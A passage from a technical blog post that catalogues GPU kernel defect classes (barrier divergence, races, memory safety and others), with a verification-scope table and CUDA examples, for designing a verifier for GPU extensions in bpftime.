&lt;/blockquote&gt;

&lt;p&gt;For &lt;strong&gt;Combined&lt;/strong&gt; bugs, the framework has two options: (1) restrict policy capabilities so the bug becomes Extension-local (e.g., forbid policies from writing kernel memory), or (2) require kernel-side contracts/annotations and validate at attach time.&lt;/p&gt;

&lt;p&gt;For &lt;strong&gt;Host+Device&lt;/strong&gt; bugs, device-side verification is insufficient; these require host-side tooling (CuSan, TSan) or runtime enforcement in the driver/loader.&lt;/p&gt;

&lt;h3&gt;
  
  
  Understanding Soundness vs. Completeness
&lt;/h3&gt;

&lt;p&gt;The &lt;strong&gt;Assurance Type&lt;/strong&gt; dimension makes explicit what guarantees each verification approach provides:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Soundness&lt;/strong&gt; answers: "If the verifier accepts, does the property definitely hold?" A sound verifier never produces false negatives (that is, it never misses a real bug).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Completeness&lt;/strong&gt; answers: "If the property holds, will the verifier accept?" A complete verifier never produces false positives (that is, it never rejects a safe program).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For safety-critical GPU extensions, we prioritize &lt;strong&gt;soundness over completeness&lt;/strong&gt;: it's acceptable to reject some safe policies if it means we never accept unsafe ones. The table below shows not just &lt;em&gt;what&lt;/em&gt; can be verified, but &lt;em&gt;how strong&lt;/em&gt; the guarantee is.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Bug Class&lt;/th&gt;
&lt;th&gt;Impact&lt;/th&gt;
&lt;th&gt;GPU Spec.&lt;/th&gt;
&lt;th&gt;Scope&lt;/th&gt;
&lt;th&gt;Assurance Type&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Barrier Divergence&lt;/td&gt;
&lt;td&gt;Safety&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;E&lt;/td&gt;
&lt;td&gt;Static-sound (enforce uniform barrier placement)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Invalid Warp Sync&lt;/td&gt;
&lt;td&gt;Safety&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;E&lt;/td&gt;
&lt;td&gt;By-construction (ban warp sync)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Insufficient Atomic/Sync Scope&lt;/td&gt;
&lt;td&gt;Correctness&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;C→E&lt;/td&gt;
&lt;td&gt;Static-sound (isolate state + device-scope)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Warp-divergence Race&lt;/td&gt;
&lt;td&gt;Correctness&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;E&lt;/td&gt;
&lt;td&gt;Static-sound (uniform side-effects)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Uncoalesced Memory Access&lt;/td&gt;
&lt;td&gt;Performance&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;E/C&lt;/td&gt;
&lt;td&gt;Static-sound (restrict patterns)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Control-Flow Divergence&lt;/td&gt;
&lt;td&gt;Performance&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;E&lt;/td&gt;
&lt;td&gt;Static-sound (enforce uniformity)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Bank Conflicts&lt;/td&gt;
&lt;td&gt;Performance&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;E&lt;/td&gt;
&lt;td&gt;Static-heuristic (enforce conflict-free patterns)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Block-Size Dependence&lt;/td&gt;
&lt;td&gt;Correctness&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;E/C&lt;/td&gt;
&lt;td&gt;Contract-based (declare requirements)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;Launch Config Assumptions&lt;/td&gt;
&lt;td&gt;Correctness&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;C&lt;/td&gt;
&lt;td&gt;Contract-based (validate at attach)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;Missing Volatile/Fence&lt;/td&gt;
&lt;td&gt;Correctness&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;E&lt;/td&gt;
&lt;td&gt;By-construction (ban spin-wait)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;Shared-Memory Data Races&lt;/td&gt;
&lt;td&gt;Correctness&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;E&lt;/td&gt;
&lt;td&gt;Static-sound (restrict writes)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;Redundant Barriers&lt;/td&gt;
&lt;td&gt;Performance&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;E&lt;/td&gt;
&lt;td&gt;Static-heuristic (detect unnecessary barriers)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;13&lt;/td&gt;
&lt;td&gt;Host ↔ Device Async Races&lt;/td&gt;
&lt;td&gt;Correctness&lt;/td&gt;
&lt;td&gt;GPU-specific&lt;/td&gt;
&lt;td&gt;H&lt;/td&gt;
&lt;td&gt;Dynamic-only (CuSan/TSan)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;14&lt;/td&gt;
&lt;td&gt;Atomic Contention&lt;/td&gt;
&lt;td&gt;Performance&lt;/td&gt;
&lt;td&gt;GPU-amplified&lt;/td&gt;
&lt;td&gt;C→E&lt;/td&gt;
&lt;td&gt;Static-sound (budgetize atomics)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;15&lt;/td&gt;
&lt;td&gt;Non-Barrier Deadlocks&lt;/td&gt;
&lt;td&gt;Safety&lt;/td&gt;
&lt;td&gt;GPU-amplified&lt;/td&gt;
&lt;td&gt;E&lt;/td&gt;
&lt;td&gt;By-construction (ban blocking)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;16&lt;/td&gt;
&lt;td&gt;Kernel Non-Termination&lt;/td&gt;
&lt;td&gt;Safety&lt;/td&gt;
&lt;td&gt;GPU-amplified&lt;/td&gt;
&lt;td&gt;E&lt;/td&gt;
&lt;td&gt;Static-sound (bound iterations)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;17&lt;/td&gt;
&lt;td&gt;Global-Memory Data Races&lt;/td&gt;
&lt;td&gt;Correctness&lt;/td&gt;
&lt;td&gt;CPU-shared&lt;/td&gt;
&lt;td&gt;C→E&lt;/td&gt;
&lt;td&gt;Static-sound (isolate state)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;18&lt;/td&gt;
&lt;td&gt;Memory Safety&lt;/td&gt;
&lt;td&gt;Safety&lt;/td&gt;
&lt;td&gt;CPU-shared&lt;/td&gt;
&lt;td&gt;E&lt;/td&gt;
&lt;td&gt;Static-sound (restrict pointers)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;19&lt;/td&gt;
&lt;td&gt;Arithmetic Errors&lt;/td&gt;
&lt;td&gt;Correctness&lt;/td&gt;
&lt;td&gt;CPU-shared&lt;/td&gt;
&lt;td&gt;E&lt;/td&gt;
&lt;td&gt;Static-sound (range analysis)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Insights from a Taxonomy of GPU Defects
&lt;/h2&gt;

&lt;p&gt;We conducted a comprehensive study of GPU correctness defects by synthesizing findings from empirical bug analyses (&lt;a href="https://arxiv.org/pdf/1905.01833" rel="noopener noreferrer"&gt;Wu et al.&lt;/a&gt;, &lt;a href="https://akkamath.github.io/files/SOSP21_iGUARD.pdf" rel="noopener noreferrer"&gt;iGUARD&lt;/a&gt;), static verifiers (&lt;a href="https://nchong.github.io/papers/oopsla12.pdf" rel="noopener noreferrer"&gt;GPUVerify&lt;/a&gt;, &lt;a href="https://lingming.cs.illinois.edu/publications/icse2020b.pdf" rel="noopener noreferrer"&gt;GKLEE&lt;/a&gt;, &lt;a href="https://github.com/ssvlab/esbmc-gpu" rel="noopener noreferrer"&gt;ESBMC-GPU&lt;/a&gt;), and runtime detectors (&lt;a href="https://docs.nvidia.com/compute-sanitizer/ComputeSanitizer/index.html" rel="noopener noreferrer"&gt;Compute Sanitizer&lt;/a&gt;, &lt;a href="https://zhangyuqun.github.io/publications/ase2019.pdf" rel="noopener noreferrer"&gt;Simulee&lt;/a&gt;, &lt;a href="https://www.csa.iisc.ac.in/~arkapravab/papers/isca20_ScoRD.pdf" rel="noopener noreferrer"&gt;ScoRD&lt;/a&gt;). Our taxonomy identifies 19 distinct classes of GPU programming defects, uncovering fundamental insights into the unique correctness challenges posed by GPU architectures:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;First&lt;/strong&gt;, we observe that &lt;em&gt;control-flow uniformity&lt;/em&gt; is a foundational correctness requirement for GPU kernels. Non-uniform execution across threads under the GPU's SIMT execution model breaks implicit synchronization assumptions and triggers GPU-specific correctness violations, such as barrier divergence, warp synchronization errors, and subtle warp-divergence races. This insight elevates uniformity from a performance concern to a correctness property that GPU verification frameworks must explicitly enforce.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Second&lt;/strong&gt;, the GPU's scoped memory synchronization semantics create correctness hazards rarely encountered on CPU platforms (e.g., block-scoped atomics used where device scope is needed, missing fences, volatile misuse). Our analysis emphasizes that the scopes of synchronization primitives must be explicit, conservative, and verifiable at the kernel level, a requirement that is critical for correctness given the subtleties of the GPU memory model.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Third&lt;/strong&gt;, performance interference in GPUs, manifested as uncoalesced accesses, atomic contention, redundant barriers, and bank conflicts, must be viewed as a &lt;em&gt;safety and isolation&lt;/em&gt; concern rather than mere inefficiency. Our taxonomy reveals how adversarial workloads exploit GPU parallelism to amplify performance issues into denial-of-service attacks in multi-tenant environments. Consequently, bounded overhead must be explicitly enforced as a correctness property in GPU extension frameworks.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Finally&lt;/strong&gt;, our study highlights that liveness (deadlocks, infinite loops) and memory safety (out-of-bounds accesses, temporal violations) are system-level concerns uniquely amplified by GPU parallelism. Unlike traditional CPU environments, GPU kernel hangs or memory violations can trigger hardware-level recovery affecting all tenants. Thus, GPU liveness and memory safety must be explicitly recognized as first-class system-level correctness properties in verifier designs.&lt;/p&gt;

&lt;p&gt;Together, these insights not only characterize GPU correctness issues more precisely but also inform principled design requirements for GPU kernel extensibility and verification frameworks, moving beyond traditional CPU-centric correctness towards a GPU-aware definition of system correctness. We are applying these principles in &lt;a href="https://github.com/eunomia-bpf/bpftime" rel="noopener noreferrer"&gt;bpftime&lt;/a&gt;; more detail is available in the &lt;a href="https://arxiv.org/abs/2512.12615" rel="noopener noreferrer"&gt;arXiv paper&lt;/a&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  Insights from Verification Scope and Assurance Analysis
&lt;/h2&gt;

&lt;p&gt;Beyond characterizing &lt;em&gt;what&lt;/em&gt; can go wrong, we analyze &lt;em&gt;whether and how&lt;/em&gt; each bug class can be addressed by a GPU extension verifier. By examining each defect through the lens of verification scope (Extension-local vs. Combined vs. Host+Device) and assurance type (soundness and completeness guarantees), we arrive at several key conclusions for GPU extension framework design.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Extension-local verification is sufficient for the majority of GPU bug classes.&lt;/strong&gt; Of the 19 defect classes identified, 12 are classified as Extension-local (E) in the table above: they can be fully addressed by examining only the policy code, without inspecting the host kernel. Some of these (#2, #10, #15) can be eliminated &lt;em&gt;by construction&lt;/em&gt; through language restrictions: banning warp sync primitives, spin-wait patterns, and blocking constructs makes entire bug classes structurally impossible. Others (#1, #7, #12) rely on &lt;em&gt;static analysis&lt;/em&gt; to enforce safe usage patterns (uniform barrier placement, conflict-free shared-memory access, redundant barrier detection) rather than outright bans, preserving useful functionality while maintaining safety. Four additional classes (#3, #5, #14, #17) that initially appear to require Combined analysis can be &lt;em&gt;reduced to Extension-local&lt;/em&gt; through state isolation, restricting policies to write only policy-owned objects (maps, ring buffers) rather than kernel data structures, which brings the total to 16. This finding validates the eBPF design philosophy: by appropriately restricting extension capabilities, a verifier can provide strong safety guarantees for &lt;em&gt;any&lt;/em&gt; kernel, including closed-source ones.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Only three bug classes fundamentally resist Extension-local verification.&lt;/strong&gt; Block-size dependence (#8) and launch configuration assumptions (#9) depend on host-determined launch parameters invisible to the policy verifier; these require a contract-based approach where policies declare preconditions validated at attach time. Host↔device async races (#13) span the host API boundary entirely outside device-side verification scope; these can only be addressed through dynamic detection tools like CuSan. Importantly, these three classes represent a small, well-defined subset that can be handled through complementary mechanisms rather than requiring full Combined verification of kernel+extension.&lt;/p&gt;
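
&lt;p&gt;As a rough illustration of the contract-based approach for #8 and #9, the following sketch checks a policy-declared precondition against the block dimensions the host chose for a launch. &lt;code&gt;LaunchContract&lt;/code&gt; and &lt;code&gt;contract_holds&lt;/code&gt; are hypothetical names invented for this example and are not part of bpftime or the CUDA API; only &lt;code&gt;dim3&lt;/code&gt; comes from CUDA.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;#include &amp;lt;cuda_runtime.h&amp;gt;

// Hypothetical preconditions a policy might declare (illustration only).
struct LaunchContract {
  unsigned min_block_threads;  // fewest threads per block the policy tolerates
  unsigned max_block_threads;  // most threads per block the policy tolerates
  bool require_1d_block;       // policy indexes with threadIdx.x only
  bool require_warp_multiple;  // block size must be a multiple of 32
};

// Returns true when the block dimensions satisfy the declared contract.
// An attach-time hook could call this and refuse to attach on false.
inline bool contract_holds(const LaunchContract&amp;amp; c, dim3 block) {
  unsigned threads = block.x * block.y * block.z;
  if (threads &amp;lt; c.min_block_threads) return false;
  if (threads &amp;gt; c.max_block_threads) return false;
  if (c.require_1d_block) {
    if (block.y != 1 || block.z != 1) return false;
  }
  if (c.require_warp_multiple) {
    if (threads % 32 != 0) return false;
  }
  return true;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;With a contract of &lt;code&gt;{32, 256, true, true}&lt;/code&gt;, a launch with &lt;code&gt;dim3(128)&lt;/code&gt; is accepted, while &lt;code&gt;dim3(16, 16)&lt;/code&gt; is rejected: it has 256 threads, but the block is not one-dimensional. The check needs only the launch parameters, which is why it can run at attach time without inspecting kernel code.&lt;/p&gt;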

&lt;p&gt;&lt;strong&gt;Soundness and completeness trade-offs are explicit and favorable for safety-critical extensions.&lt;/strong&gt; By-construction approaches (banning genuinely dangerous features like spin-wait and blocking primitives) achieve perfect soundness with high completeness for policy use cases. Static-sound approaches (uniform barrier placement, conflict-free access pattern enforcement, uniformity analysis, bounds checking, range analysis) provide strong soundness while preserving useful functionality, at the cost of conservatively rejecting some safe programs. For safety-critical GPU extensions, this trade-off is appropriate: it is better to reject a safe policy than to accept an unsafe one. The verifier's job is to guarantee safety for any kernel, not to accept every possible safe program.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A two-track verification pipeline emerges as the principled design.&lt;/strong&gt; The &lt;em&gt;production track&lt;/em&gt; provides hard guarantees for any kernel through Extension-local verification at load time, contract validation at attach time, and optional runtime enforcement for multi-tenant isolation. The &lt;em&gt;CI/offline track&lt;/em&gt; enhances coverage through Combined analysis tools (GPUVerify, ESBMC-GPU) when kernel source is available, dynamic sanitizers (Compute Sanitizer, iGUARD, Simulee) for regression testing, and host-side race detection (CuSan) for API ordering bugs. This separation acknowledges that Combined verification, while valuable for development and testing, cannot be a production requirement for systems targeting arbitrary kernels.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Performance interference can be bounded but not eliminated.&lt;/strong&gt; While adversarial workloads can systematically amplify interference through shared GPU resources (as demonstrated by "Making Powerful Enemies on NVIDIA GPUs"), the verifier can still provide meaningful guarantees: bounding policy overhead per invocation through instruction/helper budgets, limiting atomic contention through warp-aggregation requirements, and enforcing coalesced access patterns. These guarantees bound the &lt;em&gt;policy's contribution&lt;/em&gt; to interference, even if system-wide slowdown bounds remain impossible to guarantee statically.&lt;/p&gt;
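
&lt;p&gt;To show what warp aggregation means in practice, here is a minimal sketch using CUDA cooperative groups: the converged lanes of a warp elect one lane to issue a single &lt;code&gt;atomicAdd&lt;/code&gt; on behalf of the whole group. The function and kernel names (&lt;code&gt;atomic_agg_inc&lt;/code&gt;, &lt;code&gt;count_positive&lt;/code&gt;, &lt;code&gt;run_agg_demo&lt;/code&gt;) are illustrative assumptions. How a policy framework would expose such aggregation (for example, as a verified helper rather than hand-written code) is also an assumption, not something taken from bpftime.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;#include &amp;lt;cooperative_groups.h&amp;gt;
#include &amp;lt;cuda_runtime.h&amp;gt;

namespace cg = cooperative_groups;

// One atomicAdd per group of converged lanes instead of one per thread.
__device__ int atomic_agg_inc(int* counter) {
  cg::coalesced_group g = cg::coalesced_threads();
  int base = 0;
  if (g.thread_rank() == 0) base = atomicAdd(counter, (int)g.size());
  // Broadcast the leader's base value; each lane gets a distinct slot.
  return g.shfl(base, 0) + (int)g.thread_rank();
}

// Counts positive inputs with at most one atomic per converged group.
__global__ void count_positive(const int* in, int n, int* counter) {
  int i = blockIdx.x * blockDim.x + threadIdx.x;
  if (i &amp;lt; n) {
    if (in[i] &amp;gt; 0) atomic_agg_inc(counter);
  }
}

// Host-side check: the aggregated count must match a sequential count.
bool run_agg_demo() {
  const int n = 1024;
  int h_in[n];
  int expected = 0;
  for (int i = 0; i &amp;lt; n; ++i) {
    h_in[i] = (i % 3 == 0) ? 1 : -1;
    if (h_in[i] &amp;gt; 0) ++expected;
  }
  int* d_in = nullptr;
  int* d_count = nullptr;
  int h_count = -1;
  if (cudaMalloc(&amp;amp;d_in, sizeof(h_in)) != cudaSuccess) return false;
  if (cudaMalloc(&amp;amp;d_count, sizeof(int)) != cudaSuccess) {
    cudaFree(d_in);
    return false;
  }
  cudaMemcpy(d_in, h_in, sizeof(h_in), cudaMemcpyHostToDevice);
  cudaMemset(d_count, 0, sizeof(int));
  count_positive&amp;lt;&amp;lt;&amp;lt;n / 256, 256&amp;gt;&amp;gt;&amp;gt;(d_in, n, d_count);
  bool copied = cudaMemcpy(&amp;amp;h_count, d_count, sizeof(int),
                           cudaMemcpyDeviceToHost) == cudaSuccess;
  cudaFree(d_in);
  cudaFree(d_count);
  if (!copied) return false;
  return h_count == expected;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The final count is the same as with a per-thread &lt;code&gt;atomicAdd&lt;/code&gt;, but the number of atomic operations hitting the shared counter drops to one per converged group, which is the kind of bound on the policy's own contribution that a verifier could require.&lt;/p&gt;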

&lt;p&gt;In summary, the verification scope analysis reveals that the eBPF success pattern (restricting extension capabilities to what can be verified without inspecting the host) transfers effectively to GPUs. Through language restrictions, state isolation, and budgetization, a GPU extension verifier can provide strong, universal safety guarantees while relegating the few irreducibly Combined or Host+Device properties to contracts and dynamic detection.&lt;/p&gt;




&lt;h2&gt;
  
  
  Canonical Bug List
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1) Barrier Divergence at Block Barriers (&lt;code&gt;__syncthreads&lt;/code&gt;) [Safety, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;A block-wide barrier requires &lt;em&gt;all&lt;/em&gt; threads in the block to reach it. If the barrier is placed under a condition that evaluates differently across threads, some threads wait forever → deadlock / kernel hang. This is treated as a first-class defect in GPU kernel verification (e.g., "barrier divergence" in GPUVerify), and is also one of the main CUDA synchronization bug types characterized/targeted by AuCS/Wu. Note that general control-flow divergence is a performance issue, but barrier divergence is the &lt;em&gt;specific, critical case&lt;/em&gt; where divergent control flow causes threads to reach a barrier non-uniformly, turning a performance issue into a &lt;strong&gt;liveness/correctness failure&lt;/strong&gt; (deadlock).&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;float&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;16&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;__syncthreads&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt; &lt;span class="c1"&gt;// divergent barrier =&amp;gt; UB / deadlock&lt;/span&gt;
  &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mf"&gt;1.0&lt;/span&gt;&lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;GPUVerify: checking divergence is a core goal ("divergence freedom") (&lt;a href="https://nchong.github.io/papers/oopsla12.pdf" rel="noopener noreferrer"&gt;Nathan Chong&lt;/a&gt;).&lt;/li&gt;
&lt;li&gt;Simulee detects &lt;strong&gt;barrier divergence bugs&lt;/strong&gt; in real-world code (&lt;a href="https://zhangyuqun.github.io/publications/ase2019.pdf" rel="noopener noreferrer"&gt;zhangyuqun.github.io&lt;/a&gt;).&lt;/li&gt;
&lt;li&gt;Wu et al.: explicitly defines barrier divergence and places it under improper synchronization (&lt;a href="https://arxiv.org/pdf/1905.01833" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;).&lt;/li&gt;
&lt;li&gt;Tools like Compute Sanitizer &lt;code&gt;synccheck&lt;/code&gt; report "divergent thread(s) in block"; Oclgrind can also detect barrier divergence (OpenCL).&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Static check (GPUVerify-style):&lt;/strong&gt; prove that each barrier is reached by all threads in the relevant scope, often via uniformity reasoning (&lt;a href="https://nchong.github.io/papers/oopsla12.pdf" rel="noopener noreferrer"&gt;Nathan Chong&lt;/a&gt;).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dynamic check:&lt;/strong&gt; synccheck-style runtime validation, and Simulee-style bug finding (&lt;a href="https://zhangyuqun.github.io/publications/ase2019.pdf" rel="noopener noreferrer"&gt;zhangyuqun.github.io&lt;/a&gt;).&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;Require &lt;strong&gt;warp-/block-uniform control flow&lt;/strong&gt; for any path reaching a barrier (GPUVerify-style uniform predicate analysis): the verifier statically proves that every &lt;code&gt;__syncthreads()&lt;/code&gt; is reached by all threads in the block, otherwise reject. This allows policies to use barriers for legitimate shared-memory coordination while preventing divergent barriers that cause deadlocks.&lt;/p&gt;
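
&lt;p&gt;As a minimal sketch of a form such a verifier could accept, the bug example above can be restructured so that the barrier sits outside the divergent branch. The kernel name &lt;code&gt;k_uniform&lt;/code&gt;, the 64-thread block size, and the host helper &lt;code&gt;run_uniform_barrier_demo&lt;/code&gt; are assumptions made for illustration; they are not taken from GPUVerify or bpftime.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;#include &amp;lt;cuda_runtime.h&amp;gt;

#define BLOCK 64  // illustrative block size (assumption)

// Thread-dependent work stays inside the branch; the barrier does not.
__global__ void k_uniform(float* a) {
  __shared__ float tile[BLOCK];
  int i = threadIdx.x;
  if (i &amp;lt; 16) tile[i] = 2.0f;  // divergent, but contains no barrier
  else        tile[i] = 1.0f;
  __syncthreads();               // reached by every thread in the block
  a[i] = tile[(i + 1) % BLOCK];  // safe to read a neighbour's slot now
}

// Launches one block and checks the result on the host.
bool run_uniform_barrier_demo() {
  float* d = nullptr;
  float h[BLOCK];
  if (cudaMalloc(&amp;amp;d, sizeof(h)) != cudaSuccess) return false;
  k_uniform&amp;lt;&amp;lt;&amp;lt;1, BLOCK&amp;gt;&amp;gt;&amp;gt;(d);
  bool ok = cudaMemcpy(h, d, sizeof(h), cudaMemcpyDeviceToHost) == cudaSuccess;
  cudaFree(d);
  for (int i = 0; ok &amp;amp;&amp;amp; i &amp;lt; BLOCK; ++i) {
    float expected = ((i + 1) % BLOCK &amp;lt; 16) ? 2.0f : 1.0f;
    ok = (h[i] == expected);
  }
  return ok;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The only change from the bug example is where the barrier sits: the condition on &lt;code&gt;threadIdx.x&lt;/code&gt; still guards thread-dependent work, but no path to &lt;code&gt;__syncthreads()&lt;/code&gt; depends on it, so a uniformity analysis has nothing thread-dependent to reason about at the barrier.&lt;/p&gt;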

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E), Static-sound. Enforcing uniform barrier placement via static analysis prevents barrier divergence with strong soundness. Policies can use &lt;code&gt;__syncthreads()&lt;/code&gt; when the verifier can prove all threads in the block reach the barrier uniformly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: The verifier statically analyzes control flow to ensure every &lt;code&gt;__syncthreads()&lt;/code&gt; call is reached by all threads in the block. Barriers under divergent conditions (e.g., &lt;code&gt;if (threadIdx.x &amp;lt; 16) __syncthreads()&lt;/code&gt;) are rejected. This allows safe barrier usage for shared-memory coordination while preventing GPU hangs.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: For kernel-level analysis, GPUVerify proves divergence freedom via static verification; Compute Sanitizer &lt;code&gt;synccheck&lt;/code&gt; detects divergent barriers at runtime; Simulee finds barrier divergence bugs through evolutionary simulation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Some safe barrier placements under complex but provably uniform conditions may be conservatively rejected. The verifier guarantees that the &lt;em&gt;policy&lt;/em&gt; cannot introduce barrier divergence, but it cannot guarantee that the &lt;em&gt;kernel&lt;/em&gt; itself is free of this bug; kernel-level bugs require kernel-level tools.&lt;/p&gt;




&lt;h3&gt;
  
  
  2) Invalid Warp Synchronization (&lt;code&gt;__syncwarp&lt;/code&gt; mask, warp-level barriers) [Safety, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;Warp-level sync requires correct participation masks. A common failure is calling &lt;code&gt;__syncwarp(mask)&lt;/code&gt; where a lane that reaches the barrier is not included in &lt;code&gt;mask&lt;/code&gt;, or where divergence lets only a subset of the lanes named in &lt;code&gt;mask&lt;/code&gt; arrive.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
